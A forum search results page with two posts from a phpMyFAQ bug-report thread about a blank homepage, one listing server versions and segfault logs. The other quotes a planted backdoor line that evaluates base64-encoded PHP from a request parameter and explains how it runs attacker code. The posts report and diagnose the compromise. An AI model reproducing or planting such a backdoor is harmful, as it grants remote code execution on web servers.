Search found 2 matches

by audioslave
Wed Dec 15, 2010 6:54 pm
Forum: Bug reports
Topic: Blank Homepage After Category/FAQ Creation
Replies: 13
Views: 12368

Re: Blank Homepage After Category/FAQ Creation

FYI

This is what the code is running:

Code: Select all

eval(base64_decode($_REQUEST[\'phpmyfaq_new\']));
So accessing any page with ?phpmyfaq_new=**base64 encoded php code** is being executed! (this is a get example, could also be done trough a post or cookie request)
by audioslave
Tue Dec 14, 2010 10:24 pm
Forum: Bug reports
Topic: Blank Homepage After Category/FAQ Creation
Replies: 13
Views: 12368

Re: Blank Homepage After Category/FAQ Creation

I have a simuler problem, the index page is blank, admin pannel works fine. My setup: phpMyFAQ 2.6.12 Ubuntu 10.04 Apache 2.2.14 PHP 5.3.2 MySQL 5.1.41 In apache.log I get: [Tue Dec 14 21:58:33 2010] [notice] child pid 22060 exit signal Segmentation fault (11) [Tue Dec 14 21:59:18 2010] [notice] chi...